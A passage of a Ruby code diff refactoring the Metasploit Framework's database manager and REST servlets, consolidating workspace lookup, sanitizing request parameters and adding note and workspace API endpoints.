def each_exploited_host(wspace=framework.db.workspace,&block)
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace.exploited_hosts.each do |eh|
|
||||
block.call(eh)
|
||||
|
@ -8,7 +8,7 @@ module Msf::DBManager::ExploitedHost
|
|||
end
|
||||
|
||||
# This method returns a list of all exploited hosts in the database.
|
||||
def exploited_hosts(wspace=workspace)
|
||||
def exploited_hosts(wspace=framework.db.workspace)
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace.exploited_hosts
|
||||
}
|
||||
|
|
|
@ -36,7 +36,7 @@ module Msf::DBManager::Host
|
|||
# Iterates over the hosts table calling the supplied block with the host
|
||||
# instance of each entry.
|
||||
#
|
||||
def each_host(wspace=workspace, &block)
|
||||
def each_host(wspace=framework.db.workspace, &block)
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace.hosts.each do |host|
|
||||
block.call(host)
|
||||
|
@ -53,17 +53,14 @@ module Msf::DBManager::Host
|
|||
end
|
||||
|
||||
def add_host_tag(opts)
|
||||
workspace = opts[:workspace]
|
||||
if workspace.kind_of? String
|
||||
workspace = find_workspace(workspace)
|
||||
end
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||
|
||||
ip = opts[:ip]
|
||||
tag_name = opts[:tag_name]
|
||||
|
||||
host = framework.db.get_host(:workspace => workspace, :address => ip)
|
||||
host = framework.db.get_host(:workspace => wspace, :address => ip)
|
||||
if host
|
||||
possible_tags = Mdm::Tag.joins(:hosts).where("hosts.workspace_id = ? and hosts.address = ? and tags.name = ?", workspace.id, ip, tag_name).order("tags.id DESC").limit(1)
|
||||
possible_tags = Mdm::Tag.joins(:hosts).where("hosts.workspace_id = ? and hosts.address = ? and tags.name = ?", wspace.id, ip, tag_name).order("tags.id DESC").limit(1)
|
||||
tag = (possible_tags.blank? ? Mdm::Tag.new : possible_tags.first)
|
||||
tag.name = tag_name
|
||||
tag.hosts = [host]
|
||||
|
@ -74,7 +71,7 @@ module Msf::DBManager::Host
|
|||
def delete_host_tag(opts)
|
||||
workspace = opts[:workspace]
|
||||
if workspace.kind_of? String
|
||||
workspace = find_workspace(workspace)
|
||||
workspace = framework.db.find_workspace(workspace)
|
||||
end
|
||||
|
||||
ip = opts[:rws]
|
||||
|
@ -113,10 +110,7 @@ module Msf::DBManager::Host
|
|||
return address if address.kind_of? ::Mdm::Host
|
||||
end
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace = opts.delete(:workspace) || workspace
|
||||
if wspace.kind_of? String
|
||||
wspace = find_workspace(wspace)
|
||||
end
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||
|
||||
address = Msf::Util::Host.normalize_host(address)
|
||||
return wspace.hosts.find_by_address(address)
|
||||
|
@ -133,12 +127,8 @@ module Msf::DBManager::Host
|
|||
|
||||
# Returns a list of all hosts in the database
|
||||
def hosts(opts)
|
||||
wspace = opts[:workspace] || opts[:wspace] || workspace
|
||||
if wspace.kind_of? String
|
||||
wspace = find_workspace(wspace)
|
||||
end
|
||||
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||
|
||||
conditions = {}
|
||||
conditions[:state] = [Msf::HostState::Alive, Msf::HostState::Unknown] if opts[:non_dead]
|
||||
|
@ -193,10 +183,7 @@ module Msf::DBManager::Host
|
|||
end
|
||||
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace = opts.delete(:workspace) || workspace
|
||||
if wspace.kind_of? String
|
||||
wspace = find_workspace(wspace)
|
||||
end
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||
|
||||
ret = { }
|
||||
|
||||
|
@ -280,14 +267,11 @@ module Msf::DBManager::Host
|
|||
end
|
||||
|
||||
def update_host(opts)
|
||||
# process workspace string for update if included in opts
|
||||
wspace = opts.delete(:workspace)
|
||||
if wspace.kind_of? String
|
||||
wspace = find_workspace(wspace)
|
||||
opts[:workspace] = wspace
|
||||
end
|
||||
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
# process workspace string for update if included in opts
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework, false)
|
||||
opts[:workspace] = wspace if wspace
|
||||
|
||||
id = opts.delete(:id)
|
||||
Mdm::Host.update(id, opts)
|
||||
}
|
||||
|
@ -299,115 +283,4 @@ module Msf::DBManager::Host
|
|||
return [] if flavor_match.nil?
|
||||
["Windows", flavor_match.captures.first]
|
||||
end
|
||||
|
||||
#
|
||||
# Update a host's attributes via semi-standardized sysinfo hash (Meterpreter)
|
||||
#
|
||||
# The opts parameter MUST contain the following entries
|
||||
# +:host+:: -- the host's ip address
|
||||
# +:info+:: -- the information hash
|
||||
# * 'Computer' -- the host name
|
||||
# * 'OS' -- the operating system string
|
||||
# * 'Architecture' -- the hardware architecture
|
||||
# * 'System Language' -- the system language
|
||||
#
|
||||
# The opts parameter can contain:
|
||||
# +:workspace+:: -- the workspace for this host
|
||||
#
|
||||
def update_host_via_sysinfo(opts)
|
||||
|
||||
return if !active
|
||||
addr = opts.delete(:host) || return
|
||||
info = opts.delete(:info) || return
|
||||
|
||||
# Sometimes a host setup through a pivot will see the address as "Remote Pipe"
|
||||
if addr.eql? "Remote Pipe"
|
||||
return
|
||||
end
|
||||
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace = opts.delete(:workspace) || workspace
|
||||
if wspace.kind_of? String
|
||||
wspace = find_workspace(wspace)
|
||||
end
|
||||
|
||||
if !addr.kind_of? ::Mdm::Host
|
||||
addr = Msf::Util::Host.normalize_host(addr)
|
||||
addr, scope = addr.split('%', 2)
|
||||
opts[:scope] = scope if scope
|
||||
|
||||
unless ipv46_validator(addr)
|
||||
raise ::ArgumentError, "Invalid IP address in report_host(): #{addr}"
|
||||
end
|
||||
|
||||
if opts[:comm] and opts[:comm].length > 0
|
||||
host = wspace.hosts.where(address: addr, comm: opts[:comm]).first_or_initialize
|
||||
else
|
||||
host = wspace.hosts.where(address: addr).first_or_initialize
|
||||
end
|
||||
else
|
||||
host = addr
|
||||
end
|
||||
|
||||
ostate = host.state
|
||||
|
||||
res = {}
|
||||
|
||||
if info['Computer']
|
||||
res[:name] = info['Computer']
|
||||
end
|
||||
|
||||
if info['Architecture']
|
||||
res[:arch] = info['Architecture'].split(/\s+/).first
|
||||
end
|
||||
|
||||
if info['OS'] =~ /^Windows\s*([^\(]+)\(([^\)]+)\)/i
|
||||
res[:os_name] = "Windows"
|
||||
res[:os_flavor] = $1.strip
|
||||
build = $2.strip
|
||||
|
||||
if build =~ /Service Pack (\d+)/
|
||||
res[:os_sp] = "SP" + $1
|
||||
end
|
||||
end
|
||||
|
||||
if info["System Language"]
|
||||
case info["System Language"]
|
||||
when /^en_/
|
||||
res[:os_lang] = "English"
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
# Truncate the info field at the maximum field length
|
||||
if res[:info]
|
||||
res[:info] = res[:info][0,65535]
|
||||
end
|
||||
|
||||
# Truncate the name field at the maximum field length
|
||||
if res[:name]
|
||||
res[:name] = res[:name][0,255]
|
||||
end
|
||||
|
||||
res.each do |k,v|
|
||||
if (host.attribute_names.include?(k.to_s))
|
||||
unless host.attribute_locked?(k.to_s)
|
||||
host[k] = v.to_s.gsub(/[\x00-\x1f]/n, '')
|
||||
end
|
||||
elsif !v.blank?
|
||||
dlog("Unknown attribute for Host: #{k}")
|
||||
end
|
||||
end
|
||||
|
||||
# Set default fields if needed
|
||||
host.state = Msf::HostState::Alive if !host.state
|
||||
host.comm = '' if !host.comm
|
||||
host.workspace = wspace if !host.workspace
|
||||
|
||||
host.save! if host.changed?
|
||||
host_state_changed(host, ostate) if host.state != ostate
|
||||
|
||||
host
|
||||
}
|
||||
end
|
||||
end
|
||||
|
|
|
@ -6,13 +6,9 @@ module Msf::DBManager::HostTag
|
|||
raise Msf::DBImportError.new("Missing required option :name") unless name
|
||||
addr = opts.delete(:addr)
|
||||
raise Msf::DBImportError.new("Missing required option :addr") unless addr
|
||||
wspace = opts.delete(:wspace)
|
||||
raise Msf::DBImportError.new("Missing required option :wspace") unless wspace
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
if wspace.kind_of? String
|
||||
wspace = find_workspace(wspace)
|
||||
end
|
||||
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||
raise Msf::DBImportError.new("Missing required option :wspace") unless wspace
|
||||
host = nil
|
||||
report_host(:workspace => wspace, :address => addr)
|
||||
|
||||
|
|
|
@ -28,7 +28,8 @@ module HostServlet
|
|||
lambda {
|
||||
begin
|
||||
opts = parse_json_request(request, false)
|
||||
data = get_db().hosts(params.symbolize_keys)
|
||||
sanitized_params = sanitize_params(params)
|
||||
data = get_db.hosts(sanitized_params)
|
||||
includes = [:loots]
|
||||
set_json_response(data, includes)
|
||||
rescue Exception => e
|
||||
|
@ -41,7 +42,7 @@ module HostServlet
|
|||
lambda {
|
||||
begin
|
||||
job = lambda { |opts|
|
||||
data = get_db().report_host(opts)
|
||||
data = get_db.report_host(opts)
|
||||
}
|
||||
exec_report_job(request, &job)
|
||||
rescue Exception => e
|
||||
|
@ -54,9 +55,9 @@ module HostServlet
|
|||
lambda {
|
||||
begin
|
||||
opts = parse_json_request(request, false)
|
||||
tmp_params = params.symbolize_keys
|
||||
tmp_params = sanitize_params(params)
|
||||
opts[:id] = tmp_params[:id] if tmp_params[:id]
|
||||
data = get_db().update_host(opts)
|
||||
data = get_db.update_host(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
set_error_on_response(e)
|
||||
|
@ -68,7 +69,7 @@ module HostServlet
|
|||
lambda {
|
||||
begin
|
||||
opts = parse_json_request(request, false)
|
||||
data = get_db().delete_host(opts)
|
||||
data = get_db.delete_host(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
set_error_on_response(e)
|
||||
|
|
|
@ -23,7 +23,8 @@ module LootServlet
|
|||
lambda {
|
||||
begin
|
||||
opts = parse_json_request(request, false)
|
||||
data = get_db().loots(params.symbolize_keys)
|
||||
sanitized_params = sanitize_params(params)
|
||||
data = get_db.loots(sanitized_params)
|
||||
includes = [:host]
|
||||
data.each do |loot|
|
||||
loot.data = Base64.urlsafe_encode64(loot.data) if loot.data
|
||||
|
@ -45,7 +46,7 @@ module LootServlet
|
|||
opts[:data] = Base64.urlsafe_decode64(opts[:data])
|
||||
end
|
||||
|
||||
get_db().report_loot(opts)
|
||||
get_db.report_loot(opts)
|
||||
}
|
||||
exec_report_job(request, &job)
|
||||
}
|
||||
|
@ -55,9 +56,9 @@ module LootServlet
|
|||
lambda {
|
||||
begin
|
||||
opts = parse_json_request(request, false)
|
||||
tmp_params = params.symbolize_keys
|
||||
tmp_params = sanitize_params(params)
|
||||
opts[:id] = tmp_params[:id] if tmp_params[:id]
|
||||
data = get_db().update_loot(opts)
|
||||
data = get_db.update_loot(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
set_error_on_response(e)
|
||||
|
@ -69,7 +70,7 @@ module LootServlet
|
|||
lambda {
|
||||
begin
|
||||
opts = parse_json_request(request, false)
|
||||
data = get_db().delete_loot(opts)
|
||||
data = get_db.delete_loot(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
set_error_on_response(e)
|
||||
|
|
|
@ -4,18 +4,71 @@ module NoteServlet
|
|||
'/api/v1/notes'
|
||||
end
|
||||
|
||||
def self.api_path_with_id
|
||||
"#{NoteServlet.api_path}/?:id?"
|
||||
end
|
||||
|
||||
def self.registered(app)
|
||||
app.get NoteServlet.api_path_with_id, &get_note
|
||||
app.post NoteServlet.api_path, &report_note
|
||||
app.put NoteServlet.api_path_with_id, &update_note
|
||||
app.delete NoteServlet.api_path, &delete_note
|
||||
end
|
||||
|
||||
#######
|
||||
private
|
||||
#######
|
||||
|
||||
def self.get_note
|
||||
lambda {
|
||||
begin
|
||||
opts = parse_json_request(request, false)
|
||||
sanitized_params = sanitize_params(params)
|
||||
data = get_db.notes(sanitized_params)
|
||||
includes = [:host]
|
||||
set_json_response(data, includes)
|
||||
rescue Exception => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
end
|
||||
|
||||
def self.report_note
|
||||
lambda {
|
||||
job = lambda { |opts| get_db().report_note(opts) }
|
||||
begin
|
||||
job = lambda { |opts|
|
||||
get_db.report_note(opts)
|
||||
}
|
||||
exec_report_job(request, &job)
|
||||
rescue Exception => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
end
|
||||
|
||||
def self.update_note
|
||||
lambda {
|
||||
begin
|
||||
opts = parse_json_request(request, false)
|
||||
tmp_params = sanitize_params(params)
|
||||
opts[:id] = tmp_params[:id] if tmp_params[:id]
|
||||
data = get_db.update_note(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
end
|
||||
|
||||
def self.delete_note
|
||||
lambda {
|
||||
begin
|
||||
opts = parse_json_request(request, false)
|
||||
data = get_db.delete_note(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
end
|
||||
|
||||
|
|
|
@ -22,7 +22,7 @@ module ServiceServlet
|
|||
def self.get_services
|
||||
lambda {
|
||||
begin
|
||||
opts = params.symbolize_keys
|
||||
opts = sanitize_params(params)
|
||||
data = get_db.services(opts)
|
||||
includes = [:host]
|
||||
set_json_response(data, includes)
|
||||
|
@ -44,7 +44,7 @@ module ServiceServlet
|
|||
lambda {
|
||||
begin
|
||||
opts = parse_json_request(request, false)
|
||||
tmp_params = params.symbolize_keys
|
||||
tmp_params = sanitize_params(params)
|
||||
opts[:id] = tmp_params[:id] if tmp_params[:id]
|
||||
data = get_db.update_service(opts)
|
||||
set_json_response(data)
|
||||
|
|
|
@ -34,7 +34,8 @@ module VulnAttemptServlet
|
|||
begin
|
||||
job = lambda { |opts|
|
||||
vuln_id = opts.delete(:vuln_id)
|
||||
vuln = get_db.vulns(id: vuln_id).first
|
||||
wspace = opts.delete(:workspace)
|
||||
vuln = get_db.vulns(id: vuln_id, workspace: wspace).first
|
||||
get_db.report_vuln_attempt(vuln, opts)
|
||||
}
|
||||
exec_report_job(request, &job)
|
||||
|
|
|
@ -23,7 +23,8 @@ module VulnServlet
|
|||
lambda {
|
||||
begin
|
||||
opts = parse_json_request(request, false)
|
||||
data = get_db.vulns(params.symbolize_keys)
|
||||
sanitized_params = sanitize_params(params)
|
||||
data = get_db.vulns(sanitized_params)
|
||||
includes = [:host, :vulns_refs, :refs, :module_refs]
|
||||
set_json_response(data, includes)
|
||||
rescue Exception => e
|
||||
|
@ -49,7 +50,7 @@ module VulnServlet
|
|||
lambda {
|
||||
begin
|
||||
opts = parse_json_request(request, false)
|
||||
tmp_params = params.symbolize_keys
|
||||
tmp_params = sanitize_params(params)
|
||||
opts[:id] = tmp_params[:id] if tmp_params[:id]
|
||||
data = get_db.update_vuln(opts)
|
||||
set_json_response(data)
|
||||
|
|
|
@ -4,10 +4,15 @@ module WorkspaceServlet
|
|||
'/api/v1/workspaces'
|
||||
end
|
||||
|
||||
def self.api_path_with_id
|
||||
"#{WorkspaceServlet.api_path}/?:id?"
|
||||
end
|
||||
|
||||
def self.registered(app)
|
||||
app.get WorkspaceServlet.api_path, &get_workspace
|
||||
app.get WorkspaceServlet.api_path + '/counts', &get_workspace_counts
|
||||
app.get WorkspaceServlet.api_path_with_id, &get_workspace
|
||||
app.post WorkspaceServlet.api_path, &add_workspace
|
||||
app.put WorkspaceServlet.api_path_with_id, &update_workspace
|
||||
app.delete WorkspaceServlet.api_path, &delete_workspace
|
||||
end
|
||||
|
||||
#######
|
||||
|
@ -17,15 +22,11 @@ module WorkspaceServlet
|
|||
def self.get_workspace
|
||||
lambda {
|
||||
begin
|
||||
opts = parse_json_request(request, true)
|
||||
opts = parse_json_request(request, false)
|
||||
includes = nil
|
||||
if (opts[:all])
|
||||
data = get_db().workspaces
|
||||
#includes = 'hosts: {only: :count}, services: {only: :count}, vulns: {only: :count}, creds: {only: :count}, loots: {only: :count}, notes: {only: :count}'
|
||||
else
|
||||
data = get_db().find_workspace(opts[:workspace_name])
|
||||
puts "Getting data with name #{opts[:workspace_name]}"
|
||||
end
|
||||
|
||||
sanitized_params = sanitize_params(params)
|
||||
data = get_db.workspaces(sanitized_params)
|
||||
|
||||
set_json_response(data, includes)
|
||||
rescue Exception => e
|
||||
|
@ -34,25 +35,41 @@ module WorkspaceServlet
|
|||
}
|
||||
end
|
||||
|
||||
def self.get_workspace_counts
|
||||
lambda {
|
||||
begin
|
||||
set_json_response(get_db().workspace_associations_counts)
|
||||
rescue Exception => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
end
|
||||
|
||||
def self.add_workspace
|
||||
lambda {
|
||||
begin
|
||||
opts = parse_json_request(request, true)
|
||||
workspace = get_db().add_workspace(opts[:workspace_name])
|
||||
workspace = get_db.add_workspace(opts)
|
||||
set_json_response(workspace)
|
||||
rescue Exception => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
end
|
||||
|
||||
def self.update_workspace
|
||||
lambda {
|
||||
begin
|
||||
opts = parse_json_request(request, false)
|
||||
tmp_params = sanitize_params(params)
|
||||
opts[:id] = tmp_params[:id] if tmp_params[:id]
|
||||
data = get_db.update_workspace(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
end
|
||||
|
||||
def self.delete_workspace
|
||||
lambda {
|
||||
begin
|
||||
opts = parse_json_request(request, false)
|
||||
data = get_db.delete_workspaces(opts)
|
||||
set_json_response(data)
|
||||
rescue Exception => e
|
||||
set_error_on_response(e)
|
||||
end
|
||||
}
|
||||
end
|
||||
end
|
|
@ -12,7 +12,7 @@ module ServletHelper
|
|||
[500, headers, error.message]
|
||||
end
|
||||
|
||||
def set_empty_response()
|
||||
def set_empty_response
|
||||
[200, '']
|
||||
end
|
||||
|
||||
|
@ -41,7 +41,7 @@ module ServletHelper
|
|||
exec_async = opts.delete(:exec_async)
|
||||
if (exec_async)
|
||||
JobProcessor.instance.submit_job(opts, &job)
|
||||
return set_empty_response()
|
||||
return set_empty_response
|
||||
else
|
||||
data = job.call(opts)
|
||||
return set_json_response(data, includes)
|
||||
|
@ -52,10 +52,19 @@ module ServletHelper
|
|||
end
|
||||
end
|
||||
|
||||
def get_db()
|
||||
def get_db
|
||||
DBManagerProxy.instance.db
|
||||
end
|
||||
|
||||
# Sinatra injects extra parameters for some reason: https://github.com/sinatra/sinatra/issues/453
|
||||
# This method cleans those up so we don't have any unexpected values before passing on.
|
||||
#
|
||||
# @param [Hash] params Hash containing the parameters for the request.
|
||||
# @return [Hash] Returns params with symbolized keys and the injected parameters removed.
|
||||
def sanitize_params(params)
|
||||
params.symbolize_keys.except(:captures, :splat)
|
||||
end
|
||||
|
||||
#######
|
||||
private
|
||||
#######
|
||||
|
|
|
@ -85,14 +85,14 @@ module Msf::DBManager::Import
|
|||
# import_file_detect will raise an error if the filetype
|
||||
# is unknown.
|
||||
def import(args={}, &block)
|
||||
wspace = args[:wspace] || args['wspace'] || workspace
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(args, framework)
|
||||
preserve_hosts = args[:task].options["DS_PRESERVE_HOSTS"] if args[:task].present? && args[:task].options.present?
|
||||
wspace.update_attribute(:import_fingerprint, true)
|
||||
existing_host_ids = wspace.hosts.map(&:id)
|
||||
data = args[:data] || args['data']
|
||||
ftype = import_filetype_detect(data)
|
||||
yield(:filetype, @import_filedata[:type]) if block
|
||||
self.send "import_#{ftype}".to_sym, args, &block
|
||||
self.send "import_#{ftype}".to_sym, args.merge(workspace: wspace.name), &block
|
||||
if preserve_hosts
|
||||
new_host_ids = Mdm::Host.where(workspace: wspace).map(&:id)
|
||||
(new_host_ids - existing_host_ids).each do |id|
|
||||
|
@ -111,7 +111,7 @@ module Msf::DBManager::Import
|
|||
#
|
||||
def import_file(args={}, &block)
|
||||
filename = args[:filename] || args['filename']
|
||||
wspace = args[:wspace] || args['wspace'] || workspace
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(args, framework)
|
||||
@import_filedata = {}
|
||||
@import_filedata[:filename] = filename
|
||||
|
||||
|
@ -148,9 +148,9 @@ module Msf::DBManager::Import
|
|||
REXML::Security.entity_expansion_text_limit = 51200
|
||||
|
||||
if block
|
||||
import(args.merge(:data => data)) { |type,data| yield type,data }
|
||||
import(args.merge(data: data, workspace: wspace.name)) { |type,data| yield type,data }
|
||||
else
|
||||
import(args.merge(:data => data))
|
||||
import(args.merge(data: data, workspace: wspace.name))
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -243,7 +243,7 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
when 'host'
|
||||
parse_host(Nokogiri::XML(node.outer_xml).at("./#{node.name}"), wspace, bl, allow_yaml, btag, args, &block)
|
||||
when 'web_site'
|
||||
parse_web_site(Nokogiri::XML(node.outer_xml).at("./#{node.name}"), wspace, bl, allow_yaml, btag, args, &block)
|
||||
parse_web_site(Nokogiri::XML(node.outer_xml).at("./#{node.name}"), wspace, allow_yaml, &block)
|
||||
when 'web_page', 'web_form', 'web_vuln'
|
||||
send(
|
||||
"import_msf_#{node.name}_element",
|
||||
|
@ -260,7 +260,7 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
private
|
||||
|
||||
# Parses website Nokogiri::XML::Element
|
||||
def parse_web_site(web, wspace, bl, allow_yaml, btag, args, &block)
|
||||
def parse_web_site(web, wspace, allow_yaml, &block)
|
||||
# Import web sites
|
||||
info = {}
|
||||
info[:workspace] = wspace
|
||||
|
@ -285,7 +285,7 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
end
|
||||
|
||||
# Parses host Nokogiri::XML::Element
|
||||
def parse_host(host, wspace, bl, allow_yaml, btag, args, &block)
|
||||
def parse_host(host, wspace, blacklist, allow_yaml, btag, args, &block)
|
||||
|
||||
host_data = {}
|
||||
host_data[:task] = args[:task]
|
||||
|
@ -302,7 +302,7 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
end
|
||||
|
||||
host_data[:host] = addr
|
||||
if bl.include? host_data[:host]
|
||||
if blacklist.include? host_data[:host]
|
||||
return 0
|
||||
else
|
||||
yield(:address,host_data[:host]) if block
|
||||
|
@ -322,7 +322,7 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
host.xpath("host_details/host_detail").each do |hdet|
|
||||
hdet_data = {}
|
||||
hdet.elements.each do |det|
|
||||
return 0 if ["id", "host-id"].include?(det.name)
|
||||
next if ["id", "host-id"].include?(det.name)
|
||||
if det.text
|
||||
hdet_data[det.name.gsub('-','_')] = nils_for_nulls(det.text.to_s.strip)
|
||||
end
|
||||
|
@ -333,7 +333,7 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
host.xpath("exploit_attempts/exploit_attempt").each do |hdet|
|
||||
hdet_data = {}
|
||||
hdet.elements.each do |det|
|
||||
return 0 if ["id", "host-id", "session-id", "vuln-id", "service-id", "loot-id"].include?(det.name)
|
||||
next if ["id", "host-id", "session-id", "vuln-id", "service-id", "loot-id"].include?(det.name)
|
||||
if det.text
|
||||
hdet_data[det.name.gsub('-','_')] = nils_for_nulls(det.text.to_s.strip)
|
||||
end
|
||||
|
@ -415,7 +415,7 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
vuln.xpath("vuln_details/vuln_detail").each do |vdet|
|
||||
vdet_data = {}
|
||||
vdet.elements.each do |det|
|
||||
return 0 if ["id", "vuln-id"].include?(det.name)
|
||||
next if ["id", "vuln-id"].include?(det.name)
|
||||
if det.text
|
||||
vdet_data[det.name.gsub('-','_')] = nils_for_nulls(det.text.to_s.strip)
|
||||
end
|
||||
|
@ -426,7 +426,7 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
vuln.xpath("vuln_attempts/vuln_attempt").each do |vdet|
|
||||
vdet_data = {}
|
||||
vdet.elements.each do |det|
|
||||
return 0 if ["id", "vuln-id", "loot-id", "session-id"].include?(det.name)
|
||||
next if ["id", "vuln-id", "loot-id", "session-id"].include?(det.name)
|
||||
if det.text
|
||||
vdet_data[det.name.gsub('-','_')] = nils_for_nulls(det.text.to_s.strip)
|
||||
end
|
||||
|
@ -498,7 +498,7 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
:time => sess_data[:opened_at]
|
||||
)
|
||||
this_session = existing_session || report_session(sess_data)
|
||||
return 0 if existing_session
|
||||
next if existing_session
|
||||
sess.xpath('events/event').each do |sess_event|
|
||||
sess_event_data = {}
|
||||
sess_event_data[:session] = this_session
|
||||
|
|
|
@ -16,7 +16,7 @@ module Msf::DBManager::Import::Nmap
|
|||
# that. Otherwise, you'll hit the old NmapXMLStreamParser.
|
||||
def import_nmap_xml(args={}, &block)
|
||||
return nil if args[:data].nil? or args[:data].empty?
|
||||
wspace = args[:wspace] || workspace
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(args, framework)
|
||||
bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : []
|
||||
|
||||
if Rex::Parser.nokogiri_loaded
|
||||
|
@ -241,7 +241,6 @@ module Msf::DBManager::Import::Nmap
|
|||
#
|
||||
def import_nmap_xml_file(args={})
|
||||
filename = args[:filename]
|
||||
wspace = args[:wspace] || workspace
|
||||
|
||||
data = ""
|
||||
::File.open(filename, 'rb') do |f|
|
||||
|
|
|
@ -1,19 +1,4 @@
|
|||
module Msf::DBManager::Loot
|
||||
#
|
||||
# Loot collection
|
||||
#
|
||||
#
|
||||
# This method iterates the loot table calling the supplied block with the
|
||||
# instance of each entry.
|
||||
#
|
||||
def each_loot(wspace=workspace, &block)
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace.loots.each do |note|
|
||||
block.call(note)
|
||||
end
|
||||
}
|
||||
end
|
||||
|
||||
#
|
||||
# Find or create a loot matching this type/data
|
||||
#
|
||||
|
@ -25,14 +10,12 @@ module Msf::DBManager::Loot
|
|||
# This methods returns a list of all loot in the database
|
||||
#
|
||||
def loots(opts)
|
||||
wspace = opts.delete(:workspace) || opts.delete(:wspace) || workspace
|
||||
if wspace.kind_of? String
|
||||
wspace = find_workspace(wspace)
|
||||
end
|
||||
opts[:workspace_id] = wspace.id
|
||||
search_term = opts.delete(:search_term)
|
||||
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||
opts[:workspace_id] = wspace.id
|
||||
|
||||
if search_term && !search_term.empty?
|
||||
column_search_conditions = Msf::Util::DBManager.create_all_column_search_conditions(Mdm::Loot, search_term)
|
||||
Mdm::Loot.includes(:host).where(opts).where(column_search_conditions)
|
||||
|
@ -46,10 +29,7 @@ module Msf::DBManager::Loot
|
|||
def report_loot(opts)
|
||||
return if not active
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace = opts.delete(:workspace) || workspace
|
||||
if wspace.kind_of? String
|
||||
wspace = find_workspace(wspace)
|
||||
end
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||
path = opts.delete(:path) || (raise RuntimeError, "A loot :path is required")
|
||||
|
||||
host = nil
|
||||
|
@ -101,13 +81,10 @@ module Msf::DBManager::Loot
|
|||
# @param opts [Hash] Hash containing the updated values. Key should match the attribute to update. Must contain :id of record to update.
|
||||
# @return [Mdm::Loot] The updated Mdm::Loot object.
|
||||
def update_loot(opts)
|
||||
wspace = opts.delete(:workspace)
|
||||
if wspace.kind_of? String
|
||||
wspace = find_workspace(wspace)
|
||||
opts[:workspace] = wspace
|
||||
end
|
||||
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework, false)
|
||||
opts[:workspace] = wspace if wspace
|
||||
|
||||
id = opts.delete(:id)
|
||||
Mdm::Loot.update(id, opts)
|
||||
}
|
||||
|
|
|
@ -3,7 +3,7 @@ module Msf::DBManager::Note
|
|||
# This method iterates the notes table calling the supplied block with the
|
||||
# note instance of each entry.
|
||||
#
|
||||
def each_note(wspace=workspace, &block)
|
||||
def each_note(wspace=framework.db.workspace, &block)
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace.notes.each do |note|
|
||||
block.call(note)
|
||||
|
@ -21,10 +21,20 @@ module Msf::DBManager::Note
|
|||
#
|
||||
# This methods returns a list of all notes in the database
|
||||
#
|
||||
def notes(wspace=workspace)
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace.notes
|
||||
}
|
||||
def notes(opts)
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)
|
||||
|
||||
search_term = opts.delete(:search_term)
|
||||
results = wspace.notes.includes(:host).where(opts)
|
||||
if search_term && !search_term.empty?
|
||||
re_search_term = /#{search_term}/mi
|
||||
results = results.select { |note|
|
||||
note.attribute_names.any? { |a| note[a.intern].to_s.match(re_search_term) }
|
||||
}
|
||||
end
|
||||
results
|
||||
}
|
||||
end
|
||||
|
||||
#
|
||||
|
@ -55,10 +65,7 @@ module Msf::DBManager::Note
|
|||
def report_note(opts)
|
||||
return if not active
|
||||
::ActiveRecord::Base.connection_pool.with_connection {
|
||||
wspace = opts.delete(:workspace) || workspace
|
||||
if wspace.kind_of? String
|
||||
